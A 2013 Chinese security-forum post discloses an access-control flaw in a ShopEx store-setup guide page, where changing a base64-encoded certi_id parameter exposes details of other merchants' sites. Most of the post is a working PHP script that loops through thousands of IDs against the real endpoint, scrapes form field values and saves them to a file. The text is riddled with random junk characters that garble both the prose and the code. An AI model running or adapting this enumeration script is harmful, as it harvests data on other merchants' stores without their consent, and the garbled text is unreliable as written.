找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2659|回复: 0
打印 上一主题 下一主题

ShopEx某接口缺陷可遍历所有用户网站

[复制链接]
跳转到指定楼层
楼主
发表于 2013-9-21 15:59:47 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:
6 a0 V: X. |2 vShopEx某接口缺陷,可遍历所有网站) \& k2 _/ H/ q( i: p* d# V0 k: w
详细说明:4 L, {; C0 _; r4 V! w% ~5 f
问题出现在shopex 网店使用向导页面
6 T1 a) P; o& o( q6 i4 A' N! p3 Y
! U$ w6 L8 Y9 g& a% P" g* D. O1 L) k# D$ h
) A- ]7 P2 e2 S+ X* v
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=2 P$ w4 Q& c( T' J8 d7 c

6 Z# [, I: p6 K: ^; b5 H; t* h0 d) h
$ I9 m5 s% _- H
; d# U) y3 S" t; Z. P  Frefer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}4 N# K$ ^& G2 N

; y! ]% V6 e7 Z5 p+ R( }: \" |! \! z$ a
, m3 e& s$ |- U) {0 k& ?) R$ K; Q
0 ^+ g9 Q3 C8 q; j0 j) ~我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 4 R& \7 V' X: D, F. l2 d+ D

- e: K0 o8 D# A) d7 _1 ~5 r1 ^: ?3 g4 s* e5 \1 U7 s5 D
. B. j7 h; T- |
<?php6 T5 r6 _/ A; V5 l8 T/ N
$ z$ s( _; L# O8 e
                for ($i=1; $i < 10000; $i++) { //遍历$ m* {! x+ O7 h$ f8 \, i0 ^: T

3 |' L: O+ e, t. C                        ShowshopExD($i);
) I4 o2 ^( ^0 }+ l3 ^5 O: m( y2 \! G  @; `$ p. u- ~! T; M2 ?
                }8 h/ a& P$ W9 ^8 u) R' B* `$ }
1 b: [3 y/ _* f" M
                function ShowshopExD($cid) {8 K( o/ a6 `# ~

5 L- l2 ^! r- t( ~3 y                $url='http://guide.ecos.shopex.cn/step2.php';
8 g& [3 d1 K+ t$ I0 ?- l/ l+ `& U! m1 K7 \
                $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
, F, W) z' y, l" l" }
- F  ~7 f4 J+ [8 {6 A- f% e        $url = $url.'?refer='.$refer;
& y- h2 J/ J+ l  I
8 a) l; _. F0 }5 k; D  M# n2 f; A        $ch = curl_init($url);; ?) _8 {+ T7 [  G2 Q' l& J% k' _
, V. y& \4 U' a9 w
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
# \+ @: X9 @8 n% P) R9 J+ M# j
- r( I/ M' V6 I        curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
# W! H3 i, g1 b- K. y) G4 n0 r, y- j" d; r* L8 U
        $result = curl_exec($ch);5 o0 r6 D7 y$ y. P) G7 m
6 c# G, P* `; N
        $result = mb_convert_encoding($result, "gb2312", "UTF-8");
2 W/ A0 E( {8 j2 L0 Z9 t& P
& E; ~" A- u# A2 I9 L, M+ I4 ^        if(strpos($result,$refer))7 ~" O8 m" {8 [+ F
6 m) ?  Y. n" J3 K
        {
) y* n5 t/ m3 N& _
8 S( U4 u1 n! e- y- E                $fp = fopen("c:/shopEx.txt",'ab'); //保存文件
2 I$ f4 b# f* D/ }2 n
5 b- y7 K! _$ U- Y; q% V                        preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
/ E+ }1 m! I3 z# M& P' t1 y) O8 ]9 r; h
                foreach ($value[1] as $key) {
$ e8 w) h. ?4 r' w3 n. o; ^: V- R/ g, _+ ^
                        preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
9 O) X. q( Q+ r) J" ^
0 S2 [+ R  w) V  p# Y' a4 @" w7 R" J                        echo $res[1][0].':'.$res[3][0]."\r\n";
8 k+ v) S, G$ n- ]
9 m+ D9 h9 W. d! c; D                        $col =$res[1][0].':'.$res[3][0]."\r\n"; # `/ Z) p' a% ^) _( Q7 {
7 {' i+ Y8 `4 _/ P  s/ q
                        fwrite($fp, $col, strlen($col)); 8 |" Q* ^% A4 Z  r' Y

+ F" _$ q+ G7 v                }
5 v7 z2 c; O8 }' s1 q8 Y# {1 Q0 {+ N1 [! f9 Y+ o, l/ q' [
                echo '--------------------------------'."\r\n";
( S% n& i# f* X# S& x, r+ y/ @; [6 ]. O! @
                fclose($fp);
% @4 H4 u8 e/ f' J) T! s* R6 G( W# z+ P* Q0 M8 M
        }
/ v' M4 a4 U7 m% D2 [; C; p9 z
# V* ]( g' f( h3 }        flush();$ V. P+ `/ [$ e/ p% _0 J

8 @2 X+ @$ p6 l) i# n        curl_close($ch);
6 e) A2 S; o; f% c; y+ c# M
0 u+ n) ^9 T( ]) B. j0 I. S& e                }
: q+ g" e9 |* N- l- |* G! }# Q& G% K, k: H( |  l1 g
?>1 I' f0 b" P: Y5 Z- z/ @5 w
漏洞证明:- y9 N- k5 q/ X  {( ^
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
, N7 r2 V, w- frefer换成其他加密方式
* q7 ?4 d8 T7 Z! u+ m  ~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表